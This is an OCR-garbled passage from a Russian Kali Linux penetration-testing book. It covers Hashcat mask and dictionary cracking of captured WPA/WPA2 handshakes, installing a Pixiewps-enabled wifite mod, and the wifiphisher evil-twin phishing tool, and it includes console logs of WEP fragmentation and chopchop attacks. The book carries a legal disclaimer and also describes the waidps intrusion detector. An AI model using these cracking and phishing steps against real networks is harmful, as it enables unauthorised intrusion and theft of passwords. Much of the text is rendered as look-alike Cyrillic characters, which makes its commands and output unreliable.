аЬс?І?І?І?І?І 

аЬс?и?и?и?и?и 

аЬс?сІ?сІ?сІ?сІ?сІ 

аЬс?І?и??б??б?І 

аЬс?сІ?б?І?и?І 

Кто-то посчитал, что получится 125 комбинаций для такого случая. Их использование 
значительно сократит время на подбор пароля. В этом и есть настоящая сила 
сисІаНазГісаІ: или осІНазбсаІ: или НазГісаІ: на Каіі Ыпих для взлома ѴѴРА2 ѴѴРА паролей. 

Но не нужно бояться запутаться в этих масках, в нашем распоряжении такой мощный 
инструмент как пользовательские наборы символов. О них чуть ниже. 

Вы можете ещё более ускорить процесс, если вы знаете, что лицо, чей пароль вы 
разгадываете, использует только ЗАГЛАВНЫЕ буквы в начале пароля, несколько 
строчных букв и заканчивает цифрами. 

Например так: АЬссІе123 

Ваша маска будет: 

?и?І?І?І?І?сІ?сІ?сІ 

Взлом произойдёт значительно быстрее. 

Пользовательские наборы символов 

Все версии Назбсаі: имеют четыре параметра командной строки для настройки 
пользовательских наборов символов. 

Синтаксис этих параметров следующий: 


1| 

~си5І:от-сІіаг5е1:1=С5 

21 

~си$1:от-сІіаг5е1:2=С5 

3| 

-си5І:от-сІіаг5е1:3=С5 

4| 

-си5І:от-сІіаг5е1:4=С5 


Где С5 — это и есть пользовательский набор символов. С5 можно задавать как 
перебором символов, встроенными наборами символов и т. д. Чуть ниже будут 
примеры, которые помогут разобраться, если не совсем понятно. 
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У этих параметров командной строки есть и короткие аналоги: -1, -2, -3 и -4. Их можно 
использовать прямо в командной строке и в так называемых файлах пользовательских 
наборов символов ИазЬсаІ: (обычный текстовый файл с расширением .ЬссЬг, который 
содержит символы/цифры, которые будут использоваться в первой строке файла). 
Посмотрите эти примеры: 

Примеры 


Каждая следующая команда определяет одинаковый пользовательский набор 
символов, который состоит из следующих символов 

"аЬссІе1 : §Ы]кІтпоррг5І:иѵ\л/ху20123456789'' (ака "ІаІрНа-питегіс"): 


1| 

-1 аЬссІе1 : §Ы]кІтпорцг5І:иѵ\л/ху2012345б789 

21 

-1 аЬссІе^ЫікІтпорцгзІиѵѵѵхуіУс) 

3| 

-1 710123456789 

4| 

-1 ?І?СІ 

51 

-1 Іо\л/егаІрІіа_питегіс.НссНг # это файл, который содержит все цифры + символы 
(аЬссІе1§Ы]кІтпорцг$1:иѵ\/ѵху20123456789) 


Следующая команда задаёт набор символов, в который вохдят "0123456789аЬссІеГ: 


-1 7сІаЬссІе1 : 

Следующая команда задаёт полный набор 7-битных символов азсіі сНагзеІ: (ака 
"тіхаірба-питегіс-аіі-зрасе"): 

-1 ?І?б?5?и 

Следующая команда устанавливает в качестве первого пользовательского набора (-1) 
символы, специфичные для русского язьжа: 

-1 сЬаг5е1:5/5ресіаІ/Ки55Іап/ги_І50-8859-5-5ресіаІ.ІіссЬг 

На Каіі Ыпих посмотреть все доступные файлы пользовательских наборов символов 
.ЬссИг для разных языков можно командами: 


1| 

Ігее /изг/зЬаге/тазкргосеззог/сІіагзеІз/ 

Или так: 

1| 

Ігее /изг/БІіаге/ІіаБНсаі/сІіагБеІБ/ 


Помните нашу задачу: пароль начинается на аЬс, в общей сложности имеет 8 символов, 
причём в нём точно нет специальных символов. Теперь вместо составления большого 
количества масок, можно использовать следующий пользовательский набор: 

Задаём пользовательский набор, который включает все большие и маленькие буквы, а 
также цифры: 

-1 ?І?сІ?и 

Подставляем наш пользовательский набор в МАСКУ: 
аЬс?1?1?1?1?1 

Не знаю, хорошо ли вам видно, но там используются цифра 1. Буква I не используется. 

Ну хватит про МАСКи. Захватывать файлы рукопожатий (хэндшейки) можно разными 
программами. Об одном из методов было, например, рассказано в предыдущей 
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инструкции о взломе ѴѴ гр \А/РА2 ѴѴРА паролей с использованием ругіі: и соѵѵраІТѵ в Каіі 

Ыпих . Будем считать, что файлы рукопожатий у вас уже есть или вы знаете как их 
раздобыть. 


Очистка ваших файлов .сар программой ѵурасіеап 

Следующим шагом мы конвертируем файл .сар в формат, который будет понятен 
НазИсаІ; (сисІаНазбсаІ: или осі НазИсаТ). 


Для ручной конвертации .сар используйте следующую команду в Каіі Ыпих. 


1 


ѵѵрасіеап <оиСсар> <іп.сар> 


Обратите внимание, что, вопреки логике, сначала идёт выходной файл, а потом 
входной <ои1.сар> <іп.сар>. Казалось бы, логичнее было <іп.сар> <ои1:.сар>. Обратите 
на это внимание, чтобы не терять время на выяснение проблемы. 


В моём случае команда выглядит так: 


1 


ѵѵрасіеап Ііз/оиСсар Іі5/І\Іага$и_ЗЕ-83-Е7-Е9-2В-80.сар 


Конвертация файлов .сар в формат .Нссар 

Нам нужно конвертировать этот файл в формат, понятный Назбсаі: (сисІаНазбсаІ: или 
осІНазбсаІ:). 

Для его конвертирования в формат .бссар с помощью "аігсгаск-п§" нам нужно 
использовать опцию -і 


1| 

аігсгаск-п§ <ои1.сар> -} <ои1:.1тссар> 

Обратите внимание -1 это заглавная 1 а не маленькая 

В моём случае команда следующая: 

1| 

аігсгаск-п§ Ііз/оЩ.сар -і Нз/оиі: 


Взлом \Л/РА2 \Л/РА рукопожатий с НазНсаІ 

НазЬсаІ: (сисІаНазЬсаІ: или осІНазЬсаІ:) очень гибкие. Я охвачу только два наиболее 
общих и базовых сценария: 

• Атака по словарю 

• Атака по маске 


Атака по словарю 


Раздобудьте какие-нибудь словари, вроде Коскуои. Прочитайте эту заметку для 
детальных инструкций о том как получить файл словаря, отсортировать/очистить и т.д. 


Для начала нам нужно узнать, какой режим использовать для файла хендшейка \А/РА2 
ѴѴРА. Этот вопрос раскрыт в полной мере в статье «Взлом хешей паролей ІѴЮ5, рНрВВ, 
Му5Щ и 5НА1 с помощью НазИсаІ: в Каіі Ыпих». Здесь только краткое изложение: 


1 


ІтазНсаІ:-беір | §гер ѴѴРА 


Т.е. это 2500. 
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Мы используем следующую команду для старта процесса взлома: 


1| 

НазГісаІ: -т 2500 /гооі/Ьз/оиСІтссар /гооі/госкуоиТхІ: 

Команда может отличаться. Например, я использую следующий вариант: 

1| 

осіНазНсаІ: -Гогсе -т 2500 /гооі/Ііз/оиСИссар /гооі/госкуоиіхі: 

Поскольку я установил осІНазИсаІ:. 

У тех, кто установил сибаНазГісаІ:, команда выглядить так: 

1| 

сибаНазІісаІ: -т 2500 /гооі/Ітз/оиСІіссар /гооі/госкуоиТхІ: 


У меня всё получилось быстро, поскольку пароль для беспроводной ТД был простым. 
Это заняло секунды. В зависимости от размера словаря, процесс может занять 
довольно много времени. 


Не забываем, что если использовать атаку по словарю, то РугИ будет намного-намного 
быстрее чем любая из троицы сисІаНазбсаІ: или осі НазЬсаІ: или НазГісаІ:. 

Про атаку по словарю уже рассказано, не будем повторяться. Если пропустили, то 
читайте «Взлом хешей паролей М05, рГірВВ, Му5Щ. и 5НА1 с помощью НазИсаІ: в Каіі 
Ыпих» там тема атаки по словарю раскрыта в полной мере. 


Атака методом перебора — брутфорс 


Теперь главная часть этой инструкции. Использование атаки методом перебора по 
МАСКе. 


Для взлома файла рукопожатия ѴѴРА ѴѴРА2 с НазГісаІ: (сисіаНазЬсаІ: или осІНазГісаІ:) 
используйте следующую команду: 


1 


ІіазНсаІ: -т 2500 -а 3 сарішге.ітссар ?сі?сі?сі?сі?сі?сі?сі?сі 


• Где -т = 2500 означает атаку на файл рукопожатия ѴѴРА2 ѴѴРА. 

• -а = 3 означает использование брутфорса (она совместима с атакой по маске). 

• сарІиге.Гіссар = Наш конфертированный файл .сар. Мы сгенерировали его 
программами ѵѵрасіеап и аігсгаск-п§. 

• ?б?сІ?сІ?сІ?сІ?сІ?сІ?сІ = Это наша маска, где б = цифра. Это означает, что пароль 
полностью состоит из цифр, например, 78964352 или 12345678 и т.д. 

Я сделал маску под свою задачу, чтобы ускорить процесс. Вы можете создавать ваши 
собственные маски подобным образом, как объяснено выше. Если планируется 
использовать МАСКу многократно, то своё драгоценное творение можно сохранить в 
файл. Назовём его, к примеру ѵѵеЬѵѵаге-І.Гістазк. Поместить его можно к остальным 
маскам. 


/изг/зГіаге/осІГіазбсаі/тазкз/ѵѵеЬѵѵаге-І.Гістазк. 


Кстати, посмотреть дефолтныей файлы МАСОК, поставляемых с осІНазбсаІ: можно 
здесь: 


1 


І5 /изг/зГіаге/осІІіаБІісаі/тазкБ/ 
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Когда я вновь захочу использовать созданную мной маску, то команда будет примерно 
следующая: 


1 


сисІаІіазНсаІ: -т 2500 -а 3 /гооТ/Ьз/оиТ.Ьссар /изг/зНаге/осІІіаБІісаІі/тазкз/ѵѵеЬѵѵаге- 
І.Іістазк 


Пример файлов .Нстазк ЯІе 

Вы можете проверить содержимое файла образца .Нсгпазк следующей командой: 


1| 

Та іі -10 /изг/зІтаге/осІІіазІтсаі/тазкз/ВсІіаг-ІІ-Іи-ІсІ-Із-сотрІіапІ.Іістазк 

Эти фа 

йлы образцов можно использовать в оригинальном виде с НазНсаІ: (сисІаНазІісаІ: 


или осІНазбсаІ:) или отредактировать под свои нужды. 


Расположение взломанных паролей 


Назбсаі: (сибаНазЬса! или осІНазНсаІ:) сохраняет все раскрытые пароли в файл. Вы 
найдёте его в той же рабочей директории, где вы запустили Назбсаі. В моём случае я 
запускал все команды из моей домашней директории, т. е. в /гооі 


1 


саТ Назітсаі.роі: 


Заключение 

Мы рассмотрели все основные приёмы перебора паролей по маске. Тем не менее, 
отсылаю вас к официальному сайту базбсаі.пеі:, к его вики и инструкциям. Там вы 
найдёте дополнительную информацию. 

Также необходимо помнить, что существуют ещё и другие типы атак: атака по 
отпечаткам, гибридная атака, перестановочная атака, атака основанная на правиле, 
табличная атака, атака с переключением раскладки. 

Информацию о них вы найдёте на официальном сайте (на английском языке), либо в 
инструкциях на ѴѴеЬѴѴаге.Ыг . Заходите почаще, чтобы не пропустить ничего 
интересного! 


Глава 23. Мод ѴѴіЯіе с поддержкой Ріхіеѵѵрз 

Если у вас какие-либо проблемы с беспроводными устройствами, то следует 
ознакомиться с Главой 19. Лучшие совместимые с Каіі ііпих ІІ5В ѴЛ-Еі адаптеры 


Вся неделя проходит под знаком Ріхіеѵѵрз. Краткая хронология: 

1. открытие уязвимости ріхіе сіизі аНаск 

2. написание библиотеки Ріхіеѵѵрз от ѴѴііге 

3. добавлена поддержка Ріхіеѵѵрз в Кеаѵег (Ібх) 

4. Кеаѵег (ібх) с поддержкой Ріхіеѵѵрз и сама Ріхіеѵѵрз добавлены в официальные 
репозитории Каіі Ыпих 

5. Появился мод \А/іЛіе с поддержкой Ріхіеѵѵрз 
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Некоторые подробности, а что же это такое — Ріхіеѵѵрз, вы можете прочитать в 
предыдущих новостях здесь и здесь . 

Думаю, следующим шагом станет добавление мода ѴѴйДе с поддержкой Ріхіеѵѵрз в 
официальные репозитории Каіі Ыпих. Но пока этого не произошло, будем на полшага 
впереди остальных. Сделаем это сами. 

Официальный сайт мода ННрзУ/ййбиЬ.сот/аапагсНуѵ/ѵѵйДе-тосІ-ріхіеѵѵрз 

Можно зайти, скачать нужный файл (ѵѵйіІе-п§), задать ему соответствующие 
разрешения и запускать из графического интерфейса. Я покажу как это сделать из 
командной строки (удобно, если у вас доступ к Каіі Ыпих по 55Н, да и вообще, умение 
пользоваться командной строкой здорово увеличивает производительность. Нам 
нужно выполнить всего две команды. Первой мы копируем файл в каталог, где лежат 
остальные программы: 


1| 

ѵѵ§е! -оЩри^ёоситеЩ=/и5г/Ып/\лл1ч1:е-п§ 

ЫірзУ/гаѵѵ.йібгиЬизегсопІепІ.сот/аапагсІіуу/ѵѵіЯіе-тосі-ріхіеѵѵрз/тазІег/ѵѵіЯіе-пё 

Второй командой мы даём файлу разрешения на исполнение: 

1| 

сбтосі +х /изг/Ьіп/ѵѵіТіТе-пд 

Всё готово! 

Запускать так: 

1| 

\л/ій1е-п§ 


Добавленные ключи 


1| 

-рІо <зес> 

Настраивается время для атаки ріхіеѵѵрз, по умолчанию 660 

21 

-ропіу 

Использовать только ріхіеѵѵрз и вплоть до М3 

3| 

-рпорзк 

Не пропускать полученный пин через геаѵег 

4| 

-расІсКо <зес> 

Добавить п секунд до таймаута для каждого поиска хеша, по 
умолчанию 30 

51 

-ирсіаіе 

Теперь обновится до этого форма вместо оригинального ѵѵййе 

6| 

-епсііезз 

Будет включён цикл на цели до тех пор, пока не отключён вручную 


Требуемые инструменты 

Только для тех у кого НЕ Каіі Ыпих. У пользователей Каіі всё уже есть. 

Вы должны установить Ріхіеѵѵрз от ѴѴііге 
и 

Вы должны установить геаѵег-ѵѵрз-іюгк-ібх от Тбх 


Будет реализовано в дальнейшем 

• Добавлена проверка на наличие ріхіеѵѵрз, модифицированного геаѵег, и других 
обязательных для установки программ. 

• Добавлена проверка на необходимость обновления перед выполнением. 
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• Добавлена опция динамически спуфить подсоединённого клиента во время 
запущенной атаки. 

• Добавлена опция автоматически пропускать ранее взломанные ТД (вместо 
запроса). 

• Добавлена запись для отдельных точек доступа (клиенты, сила сигнала, хеши, 
найденные пины и т. д.). 


Возможно, будет реализовано в дальнейшем 

• Добавлена возможность загружать и устанавливать ріхіеѵѵрз и 
модифицированный геаѵег из §і1:биЬ 

• Добавлена поддержка тсІкЗ 

• Добавлены вычисления дефолтных пинов и опций. 


АІех@МіАІ -РС ~ 

5 55 Н гооТ@192.168.1.33 

Ьіпих каіі-тіаі 3.18. 0-ка1іЗ-алкіб4 #1 5МР ЦеЬіап 3.18.6-1~ка1і2 (2015-03-02) х86_64 

’7ММР' А ’7МР' -ММ * 7ММР' А '7МР' 

’МА ,МА ,Ѵ ММ * МА ,МА ,Ѵ 

ѴМ: ,ѴѴМ: ,Ѵ .дР"Ѵа ММ.сММЬ. ѴМ: ,ѴѴМ: ,Ѵ ,б"ѴЬ. ’7МЬ,о<18 .дР"Ѵа 

ММ. М' ММ. М’,М' ѴЬ ММ ’МЬ ММ. М’ ММ. М’8) ММ ММ’ ,М’ ѵь 

ММ А' ММ А’ 8М. ММ М8 ММ А' ’ММ А' ,рш9ММ ММ 8М. 

:ММ; :ММ; УМ. , ММ. ,М9 :ММ; :ММ; 8М ММ ММ УМ. , 

ѴР ѴР ’МЬттсГ РлуЬтсіР’ ѴР ѴР 'Моо9*Ѵо.. ЗММЬ. ’МЬтпкГ 

ТНе ргодгатБ іпсіигіесі ѵѵіТН ТНе Каіі СМіѴі-іпих БувТет аге Тгее воТТѵѵаге; 

ТНе ехасТ сіІБТгіЬиТіоп ТеггпБ Тог еасН ргодгаш аге сІезсгіЬесі іп ТНе 
іпгііѵісіиаі Тііев іп /и5г/5Наге/«1ос/*/соругідНТ. 

Каіі СМІІ/І-іпих сошез ѵѵіТН АВ50ШТЕІ.У N0 NАККА^^ТV, То ТИе ехТепТ 
регшіТТеЬ Ьу аррІісаЫе Іаѵѵ. 

ЬавТ Іодіп: Кегі Мау б 03:32:08 2015 Тголі 192.168.1.35 

гооТ@ка!і-шіаі ѵѵіТіТе-пд 


II II 


С ) 

/ _ \ 

/ _ \ 

/ \ 


I I 

II II 

II II II 


ИіРіТе ѵ2 (П09) 
аиТотаТегі \ѵіге1е55 аигііТог 
гіеБІдпес) Тог Ціпих 


посІіТіесІ Ьу аапагсНуу(аапагсНуу@дтаі1. сот) 

ІгесІіТз То ѵѵііге.ОаТаНеасІ.БОхгокггіг.пхххи.пигоо 

ТИе ргодгаш іб поТ гедиігеЬ, ЬиТ іб гесошшепсіес) 

[+] зсаппіпд Тог ѵігігеіезз гіеѵісез... 


Глава 24. Взлом ѴѴі-Рі сетей: инструменты, которые не попали в 
Каіі Ыпих 

Если у вас какие-либо проблемы с беспроводными устройствами, то следует 
ознакомиться с Главой 19. Лучшие совместимые с Каіі ііпих ІІ5В ѴЛ-Еі адаптеры 
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Каіі Ыпих включает большой комплект инструментов предназначенных, по большей 
части, для тестирования на проникновение. Разработчики Каіі следят за выходом новых 
инструментов и даже предлагают всем желающим рекомендовать новые программы, 
которые они ещё не включили. 

Благодаря такой открытости и обратной связи, в Кали есть практически всё, что нужно 
подавляющему большинству пентестеров. Тем не менее, есть немало 
программ которые они пропустили или сознательно не включают в свой дистрибутив. Я 
хочу рассказать о четырёх таких программах. Каждая из них предназначена для атаки 
на беспроводные сети (\Л/і-Рі). Каждая из них имеет в своём функционале особенности, 
которые не сводятся к возможностям уже доступных программ. 

Важно отметить, что в этой заметке не ставится задача научить пользоваться этими 
программами. Для этого нужны отдельные многостраничные мануалы. Главная цель — 
это информационная, т. е. просто привлечь к ним внимание. 

Глядя на некоторые из этих программ и думая «почему они не попали в Каіі?», я 
вспоминаю шутку: «его выгнали из спецназа... за избыточную жестокость». Я публикую 
эту информацию на следующих условиях: 

• она предназначена для образовательных целей; 

• она предназначена для демонстрации угроз в отношении беспроводных сетей; 

• она предназначена для аудита собственных беспроводных сетей и устройств; 
либо сетей других лиц только после получения (письменного) разрешения от 
них; 

• если вы не поняли/не прочитали/не стали прислушиваться к вышеприведённым 
пунктам, то вы самостоятельно несёте ответственность за возможные 
последствия. 

Взлом и даже атаки (попытки взлома) беспроводных сетей, а также перехват учётных 
данных и другой персональной информации, являются правонарушениями или даже 
преступлениями. За них в законодательстве предусмотрена ответственность, вплоть 
до уголовной. Всё, что вы делаете, вы делаете на свой страх и риск — я за ваши 
действия и их последствия не отвечаю. 


Чтобы наши новые программы не валялись по всему диску, в домашнем 
каталоге создадим специальную папку для них. И все сторонние программы будем 
ставить в этот каталог: 


1| 

ссі ~ 

21 

тксііг орі: 


ѵуійрЫзНег 

Официальная страничка: ЬНрБУ/йіібиЬ.сот/зорІігоп/ѵѵіЯрЫзІіег 

ѴѴіЯрЫзЬег предназначена для фишинговой атаки на \Л/іГі сети в целях получения 
паролей от ТД и другой персональной информации. Этот инструмент основан на атаке 
социальной инженерии. Т.е. эта программа не содержит каких либо инструментов для 
брутфорсинга. Это простой способ получить учётные данные от сайтов или пароли от 
ѴѴРА/ѴѴРА2. 


ѴѴіЯрГіізГіег работает на Каіі Ыпих и распространяется по МІТ лицензии. 
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Если смотреть глазами жертвы, то атака включает три фразы: 

1. Жертва деаутентифицируется от её точки доступа. ѴѴіЯрЫзНег постоянно 
заминает все точки доступа устройств ѵѵіЯ в радиусе действия посредством 
отправки деаутентифицирующих (сіеаиіЬ) пакетов клиенту от точки доступа и 
точке доступа от клиента, а также широковещательному адресу. 

2. Жертва подсоединяется к подменной точке доступа. ѴѴіЯрЫзНег сниффет 
пространство и копирует настройки целевых точек доступа. Затем она создаёт 
подменную ТД, которая смоделирована для цели. Она также устанавливает 
1МАТ/0НСР сервер и перенаправляет правильные порты. Следовательно, из-за 
помех клиенты начнут подсоединяться к подменной точке доступа. После этого 
жертва подвергается атаки человек-по-середине. 

3. Для жертвы будет отображена реалистично выглядящая страница 
конфигурации роутера. ѵѵіЯрЫзНег поднимает минимальный веб-сервер и 
отвечает на НТТР & НТТР5 запросы. Как только жертва запросит страницу из 
Интернета, ѵѵіЛрНізЬег в ответ отправит реалистичную поддельную страницу, 
которая спросит пароль, для, например, одной из задач, которые требуют 
подтверждение ѴѴРА пароля во время обновления прошивки. 


Требования для ѵѵіЯрЫзНег 


Нужны две сетевые карты, причём одна с поддержкой инжекта. 

Программа использует пакет бозіарсі, поэтому, если он отсутствует, установите его: 


1 


ар1-§е1 іпБіаІІ НозТарсІ 


Установка и запуск ѵѵіЯрЫзНег 


1| 

ссі ~/ор{ 

21 

§ІІ сіопе ЫірзУ/^ібтиЬ.сот/БорІігоп/ѵѵібрІіізІтег 

3| 

ссі ѵѵіІтрЫзІтег/ 

Запускаем так: 

1| 

руіііоп ѵѵібрЫзІіег.ру 
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[+] 

Сігі 

-С аХ апу Іітѳ *о сору ап ассезз роіпі: ‘Ггот Ьеіом 

пит 

сЬ 

Е55Ю 

1 

- 1 

- хазакі 


- 1 

- СОПП-Х-Г4ІСІ8 

3 

- 1 

- ТЬотзоп06О09С 

4 

- 6 

- ВІ6 В00ВЗ 


- 6 

- МіпсІ МіРі ЪУАѴІед 

6 

- 6 

- РѳИѳг Рап 


- 6 

- СОШХ 1 

8 

- 6 

- СОШ-Х 6486 

9 

- 6 

- ОТЕМЕТ 6364 

10 

- 7 

- сопп-хѳ0'Гс94 

11 

- 9 

- Ьоі ыі"Рі 

12 

- 11 

- тап-тах 

13 

- 11 

- @Адга 


Іаттіпд сіеѵісѳз: 

[*] 2с :26:с5:74:40:1с - 1с :65:9сІ:91 :Ь8:68 - 9 - аіг-зип 
[*] 2с :26 :с5:74:40 : 1с - 1с :99:4с :сІЗ :6е :30 - 9 - аіг-зип 
[*] 2с:26:с5:74:40:1с - 9 - аіг-зип 


ЭНСР І_еазез: 

1432462884 40:ТЗ:08: ІЬ :Зс :42 10.0.0.62 апсігоісІ-6с4998Ѳ910іе9418 01:40: ІЗ :08:ГЬ:3с :42 


НТТР гедиезіз: 

[*] СЕТ 10.0.0.62 
[*] Р05Т 10.0.0.62 

[ ] Сіозіпд 
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Как противостоять ѵѵіЯрНізНег 

Для выявления самых разных атак, в том числе связанных с попыткой разорвать 
существующие соединения и подключить клиентов к подложным точкам доступа, 
можно использовать программу ѵѵаісірз. Продолжаем чтение. 


ѵѵаісірз 

Домашняя страница: НіірзУ/йіібиЬ.сопѴБУѴѴогкз/ѵѵаісІрз 

ѵѵаісірз — мощный комбайн, первый взгляд на который может вызвать растерянность. Я 
не буду даже пытаться в этой короткой заметке осветить порядок работы — на сайте 
автора для этой цели написано большое количество многостраничных инструкций. 
Количество команд в этой программе просто умопомрачительное. Поэтому я только 
расскажу о главных функциях и о процессе установки. Всё остальное — в отдельных 
статьях. 

Кроме обычных функций по аудиту беспроводных сетей, ѵѵаісірз способна выявлять 
атаки на беспроводные ТД. Я не знаю других программ с подобным функционалом. 

ѴѴАЮР5 — это программа с открытым кодом, написанная на РуіГіоп и работающая в 
окружении Ыпих. Точные зависимости не указаны, но при запуске в Каіі, программа 
создаёт/копирует необходимые базы данных и сразу же готова к работе. Т.е. в Каіі 
Ыпих присутствуют все необходимые компоненты для этой программы. Это 
многоцелевой инструмент, созданный для аудита (тестирования на проникновение) 
сетей, обнаружения беспроводного вторжения (атаки ѴѴЕР/ѴѴРА/ѴѴР5) а также 
предотвращения вторжения (остановка связи станции с точкой доступа). Кроме этого, 
программа будет собирать всю \Л/іРі информацию в округе и сохранять в базах данных. 
Она будет полезной когда настанет время аудита сети: если точка доступа с 
включённым «фильтром по МАС» или «скрытым 55Ю» и не было ли клиентов на 
интересующие момент. 

ѴѴАЮ5 пригодится тестерам на проникновение, тренерам по беспроводным сетям, 
правоохранительным органам и всем тем, кто интересуется беспроводным аудитом и 
проникновением. Главная цель этого скрипта — это выявление вторжения. Когда оно 
обнаружено, скрипт отображает информацию на экране, а также записывает в журнал. 

На данный момент ѴѴАЮ5 способна обнаружить следующие беспроводные атаки (это в 
дополнении к тем, которые обнаруживает ѴѴІР5 ): 

• Аззосіаііоп / АиіГіепіісаііоп ЯоосІіп§ 

• Выявление массовых деаутентификаций, которые могут сигнализировать о 
возможной атаке на \Л/РА для перехвата рукопожатий 

• Выявление возможных атак МЕР с использованием АКР запросов методом 
воспроизведение 

• Выявление возможных атак ѴѴЕР с использованием метода сГюрсГюр 

• Выявление возможных атак перебором \Л/Р5 пина с использованием Кеаѵег, 
Ви Му и т.д. 

• Выявление Злого-Двойника (ЕѵіГТѵѵіп) 

• Выявление мошеннической точки доступа 
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Установка и запуск лл/аісірз 


1| 

ссі ~/орТ 

2 1 

§І1: сіопе ЬіТр5://§і1:ЬиЬ.сот/5Ѵ\Л/огк5/ѵѵаісІр5 

3| 

ссі ѵѵаіеірз 

4| 

руіііоп ѵѵаіеірз.ру 


Фрагментация: 


[?] ЗеІесТ ап орТіоп ( 

ЗеІесТ есі ==> 02 

- КеТигп ) : 02 



[.] 2014-10-0215:03:00- 

[.] 2014-10-0215:03:00- 

Зепсііпд кеер-аііѵе раскеТ То Асееве РоіпТ | 
АисІіТіпд Асеева РоіпТ [ 00:02:6Р:00:00:00 ' 

[ 00:02:6Р:00:00:00 1... 

1 ивіпд [ РгадгпепТаТіоп (Кедиіге СІіепТ) ! 

1 іпеТІюсі. . . 

2014-10-02 15:03:04 - 

Реасі 352 РаскеТз. . | 




[?] ЗеІесТ ап орТіоп ( - КеТигп ) : 02 

ЗеІесТ есі ==> 02 

[.] 2014-10-02 15:03:00 - Зепсііпд кеер-аііѵе раскеТ То Асееве РоіпТ [ 00:02: 6Р: 00:00:00 ]... 


[.] 2014-10-02 15:03:00 - АисІіТіпд Асеева РоіпТ [ 00:02:6Р: 00:00:00 ] ивіпд [ 


Іоп (Кедиіге СІіепТ) ] меТІМИІ. .. 


[.] 


2014-10-02 15:03:10 - СНоееп раскеТ заѵесі іп герІау_згс-1002-150310. сар 
2014-10-02 15:03:10 - йаТа раскеТ Тоипсі! 

2014-10-02 15:03:10 - Зепсііпд ТгадтепТесІ раскеТ 
2014-10-02 15:03:10 - СоТ РЕІ.АУЕ0 раскеТ!! 

2014-10-02 15:03:10 - Тгуіпд ТодеТ 384 ЬуТез оТ а кеувТгеаш 
2014-10-02 15:03:10 - СоТ РЕІ_АѴЕй раскеТ!! 

2014-10-02 15:03:10 - Тгуіпд ТодеТ 1500 ЬуТее оі а кеувТгеаш 

2014-10-02 15:03:10 - СоТ РЕ1.АУЕ0 раскеТ!! 

2014-10-02 15:03:10 - КеувТгеаш (ХОК) раскеТ заѵесі іп / . 5ѴМогкз/5аѵес1/РгадшепТ_ООО26РООО0ОО. хог 

2014-10-02 15:03:10 - Рогдіпд АРР РаскеТ ѵіТН ІР а$ 255.255.255.255 апсі СаТеѵау аз 255.255.255.255 йопе. . . 

2014-10-02 15:03:10 - РгадгпепТаТіоп АКР геріау раскеТ заѵесі іп /. 5ѴИогке/МАЮР5/Ттр/РК6А. сар 

2014-10-02 15:03:10 - АисІіТіпд Асеева РоіпТ [ 00:02:6Р: 00:00:00 ] ивіпд [ ІпТегасТіѵе АКР Керіау Н.епегаТесІ АКР) ] шеТНосІ. 
2014-10-02 15:03:10 - РгадшепТаТіоп НеТЬосІ СошрІеТесІ 


2014-10-02 15:03:56 - СарТигесІ ІѴз 5068 [РаТе 632 ІѴз/5ес] , Веасоп : 494, АР Роѵег : -44 сІВт (Соосі)| 


Фрагментация воспроизведение: 


ш 

5е1есТ ап орТіоп ( 0 
ЗеІесТ есі ==> 02 

- КеТигп ) : о2 



[і] 

А ргеѵіоив кеувТгеаш 

мае Тоипсі. 




Ѵои сіо поТ пеесі То гедепегаТе а пем кеувТгеаш адаіп. 



Ш 

Ргосеесі То иве ТЬів I 
ЗеІесТ есі ==> V 

’ ( Ѵ/п ) : у 




2014-10-02 15:05:05 ■ 

Овіпд КеувТгеаш (ХОК) раскеТ : /. ЗѴѴ/огкв/Заѵесі/ РгадшепТ 00026Р000000. хог 




2014-10-02 15:05:05 - 

Рогдіпд АРР РаскеТ ѵіТН ІР аз 255.255.255.255 апсі СаТеѵау аз 255.255.255.255 

йопе... 



2014-10-02 15:05:05 - 

РгадшепТаТіоп АКР геріау раскеТ заѵесі іп /. ЗѴМогкв/МАІОРЗ/Тшр/РКСА. сар 



м 

2014-10-02 15:05:05 - 

АисІіТіпд Асеева РоіпТ [ 00:02:6Р: 00:00:00 1 ивіпд [ ІпТегасТіѵе АКР Керіау (СепегаТесІ АКР) ! 

1 шеТИосІ. . . 


2014-10-02 15:05:07 - 

СарТигесІ ІѴз 13125 [РаТе 232 ІѴз/5ес], Веасоп : 978 , АР Роѵег : -50 сІВт (Соосі) 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 


СНорсЬор: 


ш 

5е1есі ап орііоп ( 0 
Зеіесіесі ==> 01 

- Кеіигп ) : 01 



[.] 

[.] 

2014-10-02 14:51:21 - 
2014-10-02 14:51:21 - 

5епс!іпд кеер-аііѵе раскеі іо Ассезз Роіпі | 
Аисііііпд Ассезз Роіпі [ 00: 02: 6Р: 00:00:00 ] 

00: 02: 6Р: 00:00:00 1 ... 

1 изіпд I КогеК СНорСНор (Редиіге Сііепі) 

] теіИосІ. . . 


2014-10-02 14:51:24 - 

КеасІ 153 Раскеі з . . . . 




2014-10-02 14:52:07 - СНозеп раскеі заѵесі іп геріаузгс- 1002-145207.сар 


2014-10-02 14:52:08 - Оіізеі 
2014-10-02 14:52:09 - Оіізеі 
2014-10-02 14:52:11 - Оіізеі 
2014-10-02 14:52:12 - Оіізеі 


67 5: (Іопе) | ХОР = 39 | Р1: = 

66 8 сіопе) | ХОК = 8С | Рі = 

65 ( 11 (Іопе) | ХОК = Р9 | = 

64 13 (Іопе) | ХОК = Р9 | Рі = 


2014-10-02 14:52:12 - 5епі 220 Раскеіз....Сиггепі ОВ... 


ІА | 278 ігатез ѵгіііеп іп 4735 Ш5 

С7 | 280 ігатез ѵгіііеп іп 4759 тз 

06 | 1068 ігатез ѵгіііеп іп 18158 тз 

2А | 276 ігатез ѵгіііеп іп 4694 тз 


[.] 2014-10-02 14:51:21 - 5епсІіпд кеер-аііѵе раскеі Іо Ассезз Роіпі [ 00: 02:6Р: 00:00:00 ]... 

[.] 2014-10-02 14:51:21 - Аисііііпд Ассезз Роіпі [ 00: 02: 6Р: 00:00:00 ] изіпд [ геК СНорСНор (Кедиіге Сііепі ] теіЬосІ. .. 


2014-10-02 14:52:07 - СНозеп раскеі заѵесі іп гер1ау_згс*1002*145207.сар 


2014-10-02 

14:52:08 

Оіізеі 

67 

( 5*і сіопе) 

і 

ХОК 

= 

39 

і 

РІ 

= 

ІА 1 

278 

ігатез 

ѵггі-іеп 

іп 

4735 

ІП5 

2014-10-02 

14:52:09 

Оіізеі 

66 

( 8*. сіопе) 

і 

ХОК 

= 

8С 

і 

РІ 

= 

С7 1 

280 

ігатез 

ѵгіі-іеп 

іп 

4759 

Ш5 

2014-10-02 

14:52:11 

Оіізеі 

65 

